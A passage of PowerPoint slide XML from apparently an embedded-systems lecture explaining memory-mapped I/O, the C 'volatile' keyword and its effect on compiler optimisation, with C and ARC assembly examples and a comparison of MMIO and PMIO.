                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86021" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3886200"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Any reasonable compiler would optimize it (no need to read memory more than once):</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4800600"/>
            <a:ext cx="7848600" cy="1739900"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wait_for_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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address)</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*)address;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 =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-&gt;member;</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 == 0) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="180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407680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2253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Renaming makes it look different…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2362200"/>
            <a:ext cx="7848600" cy="1465263"/>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wait_until_ready</a:t>
            </a:r>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(mac-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>status.valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 0) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3886200"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now the optimization doesn’t do what we expect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23557" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4800600"/>
            <a:ext cx="7848600" cy="1754188"/>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wait_until_ready</a:t>
            </a:r>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 = mac-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>status.valid</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 == 0) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="180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5980523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dirty="0" smtClean="0"/>
              <a:t>Volatile Keyword</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In the MMIO hardware case, “memory” content can change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>without notice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(by the hardware)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The “volatile” keyword warns the compiler to make no assumptions on the data stored in the variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“volatile” is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>type qualifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (like “const”) and can be used for any declaration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, unions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>enums</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> or variables)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4495800"/>
            <a:ext cx="3276600" cy="147478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
        <p:nvSpPr>
          <p:cNvPr id="24581" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="5392738"/>
            <a:ext cx="4953000" cy="1474787"/>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
        <p:nvSpPr>
          <p:cNvPr id="24582" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4419600"/>
            <a:ext cx="3276600" cy="147478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5382320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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Volatile – example – test.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1905000"/>
            <a:ext cx="7848600" cy="449580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1  </a:t>
            </a:r>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2  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3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ready;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4  } REGS;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6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func1()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8  	REGS*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(REGS*)(0x400000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9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-&gt;ready) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12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func2()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>14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REGS*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REGS*)(0x400000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>15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-&gt;ready) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>16 } </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38474821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US" smtClean="0"/>
              <a:t>Volatile – example – test.s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="7848600" cy="504507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	; --------------| func1 |--------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>func1:</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mov_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r1,0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bset_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r1,%r1,22</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ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r0,[%r1] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.LN01.34:</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cmp_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r0,0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jne_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	[%blink]</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b_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.LN01.34</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	; --------------| func2 |--------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>func2:</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mov_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r1,0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bset_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r1,%r1,22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.LN02.34:</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ld.di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r0,[%r1]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cmp_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r0,0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jne_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	[%blink]</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b_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	.LN02.34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9404104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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Another example – why do we need “volatile”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1905000"/>
            <a:ext cx="7848600" cy="339725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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc_two_hundred</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2   {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3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*)(0x00100000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4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stat.bits.clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5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 = 5;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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6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 = 30;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7	   _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</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8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 = 25;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9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 = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10	   _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</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11	   return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res_lo</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12 } </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5334000"/>
            <a:ext cx="4911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a:t>What will this function return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36426381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MMIO vs. PMIO</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PMIO requires special processor logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More complex processor – more expensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In ARC case – less functionality on aux bus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MMIO reduces memory address space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Especially for 16-bit address space processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MMIO can create a bottleneck on the memory bus</a:t>
            </a:r>
          </a:p>
          <a:p>
